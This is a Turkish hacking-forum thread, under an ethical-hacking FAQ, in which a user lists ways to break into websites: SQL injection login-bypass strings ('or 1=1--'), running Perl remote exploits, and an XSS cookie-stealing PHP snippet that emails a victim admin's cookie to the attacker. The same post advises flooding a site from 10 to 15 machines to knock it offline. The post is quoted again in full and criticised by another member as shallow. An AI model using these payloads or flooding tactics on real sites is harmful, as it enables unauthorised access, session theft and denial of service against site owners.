Site Hackleme Yöntemleri

Q: Türkiye'nin En Büyük Hack Forumu SpyHackerz mı?

SpyHackerz, Türkiye'nin en aktif ve en köklü siber güvenlik forum topluluklarından biridir. Binlerce üyesiyle etik hacking, siber güvenlik ve penetrasyon testi konularında Türkiye'nin lider platformlarından biri olmaya devam etmektedir.

Q: Üye olmak ücretli mi?

Hayır, SpyHackerz'e üye olmak tamamen ücretsizdir. Kayıt olarak topluluğa katılabilir, içeriklere erişebilir ve forum tartışmalarına katılabilirsiniz.

Q: Ethical hacking nedir?

Etik hacking, sistemlerin güvenlik açıklarını yetkili bir şekilde test etme ve raporlama sürecidir. Etik hackerlar, kötü niyetli saldırganlardan önce açıkları bularak kurumların güvenliğini artırmalarına yardımcı olur.

Q: Siber güvenlik öğrenmek için nereden başlamalıyım?

Siber güvenliğe başlamak için önce temel ağ ve işletim sistemi bilgisi edinmeniz önerilir. Ardından SpyHackerz forumundaki eğitim kategorilerini takip edebilir, CTF yarışmalarına katılabilir ve TryHackMe ile HackTheBox üzerinde pratik yapabilirsiniz.

Q: Nasıl etik hacker olurum?

Etik hacker olmak için Linux, ağ protokolleri ve programlama temellerini öğrenmekle başlayabilirsiniz. CEH, OSCP gibi sertifikalar kariyerinizi güçlendirir. SpyHackerz topluluğu bu yolculukta size rehberlik edecek binlerce kaynak ve deneyimli üye sunmaktadır.

kr4l · 24 Eyl 2016

Sgl İnjection Yoluyla ;
öncelikle hedef sitenin admin paneline ulaşmak istersiniz bunun için çeşitli exploitler vardır admın paneline ulaşmak için sql inj deneyebiliriz.username: or 1=1--şifre : or 1=1--gibi admin paneline böyle şeyler yazarak bir ihtimalde olsa girebilme şansımız vardır daha fazlasını forumda aratarak bulabilirisniz.
Exploit Yoluyla;
o sitenin portalına uygun olarak remote gibi bir exploit türü bulduğumuzda bunu perlde çalıştırarak sitede yetki sahibi olabiliriz.perl exploit kullanımı forumda mevcut aratırsanız bulabilirsiniz.eğer geniş bilgi istiyorsanız verebilirim.
Xss Yoluyla;
eğer serverda html komutları açık ise admin cookisini çalarak giriş yapabiliriz.yada adminin mailine xss yollayabiliriz.<? $cookie = $_GET['data']; $kime = "[email protected]";$konu = "cookie";mail ($kime,$konu,$cookie);?>bu kodu yazarak mesela.yada yönlendirme kodunu yazarakta yönlendirebiliriz siteyi başka bir adrese.Ayrıca htmlnin açık olup olmadıgını sitede mesaj yazma kısmına gelip sol alt taraflara bakarsanız oralarda yazar.
Flood Yoluyla;
flood yoluyla siteyi yavaşlatabilir yada bir süreliğine kapatabilirisiniz.flood programları sitede mevcut indirerek çalıştırabilirisiniz ama eğer bu uygulamayı 10-15 tane ayrı bilgisarlardan yaparsanız daha etkili olur.

beyazkiller · 24 Eyl 2016

elıne saglık

Ar@gorn · 24 Eyl 2016

kr4l' Alıntı:
Sgl İnjection Yoluyla ;
öncelikle hedef sitenin admin paneline ulaşmak istersiniz bunun için çeşitli exploitler vardır admın paneline ulaşmak için sql inj deneyebiliriz.username: or 1=1--şifre : or 1=1--gibi admin paneline böyle şeyler yazarak bir ihtimalde olsa girebilme şansımız vardır daha fazlasını forumda aratarak bulabilirisniz.
Exploit Yoluyla;
o sitenin portalına uygun olarak remote gibi bir exploit türü bulduğumuzda bunu perlde çalıştırarak sitede yetki sahibi olabiliriz.perl exploit kullanımı forumda mevcut aratırsanız bulabilirsiniz.eğer geniş bilgi istiyorsanız verebilirim.
Xss Yoluyla;
eğer serverda html komutları açık ise admin cookisini çalarak giriş yapabiliriz.yada adminin mailine xss yollayabiliriz.<? $cookie = $_GET['data']; $kime = "[email protected]";$konu = "cookie";mail ($kime,$konu,$cookie);?>bu kodu yazarak mesela.yada yönlendirme kodunu yazarakta yönlendirebiliriz siteyi başka bir adrese.Ayrıca htmlnin açık olup olmadıgını sitede mesaj yazma kısmına gelip sol alt taraflara bakarsanız oralarda yazar.
Flood Yoluyla;
flood yoluyla siteyi yavaşlatabilir yada bir süreliğine kapatabilirisiniz.flood programları sitede mevcut indirerek çalıştırabilirisiniz ama eğer bu uygulamayı 10-15 tane ayrı bilgisarlardan yaparsanız daha etkili olur.

Anlatım İçin teşekkürler dostum...

The_DeMoN · 24 Eyl 2016

Yanlış anlama arkadaşım ama bişey anlamadım. sql injection demişsin ama admin panel bypass tekniğini anlatmışsın. Arayada "şeyler" gibi genel bir kelime koymuşsun. Şey nedir? 20-25 sene önce salı günleri "Aranan Adam" diye bir program var. Haber başlıkları nasıldı biliyor musun? "Şeyini şey etttiğimin şeyi, aranan adamda" "şeyin şeyi şey olmuş, aranan adamda" "şey şey mi" gibi.

Exploit yoluyla diyorsun. Exploiti çalıştırmak için (local root örneğin) sitede bir şekilde dosyaları editleme, görme yetkimizin olması lazım (shell upload). Bir şekilde exploiti ya uzaktan bağlanıp, veya online olarak çalıştırabilmeliyiz.

Birde 2 cümle yazıp gerisi forumda mevcut demişsin. Ben kimseyi kötülemeye çalışmıyorum.Ben istiyorum ki bu forumda kaliteli içerikler paylaşılsın.

Site Hackleme Yöntemleri

Daha fazla seçenek

kr4l

beyazkiller

Ar@gorn

The_DeMoN

Dost

About Us & Legal Notice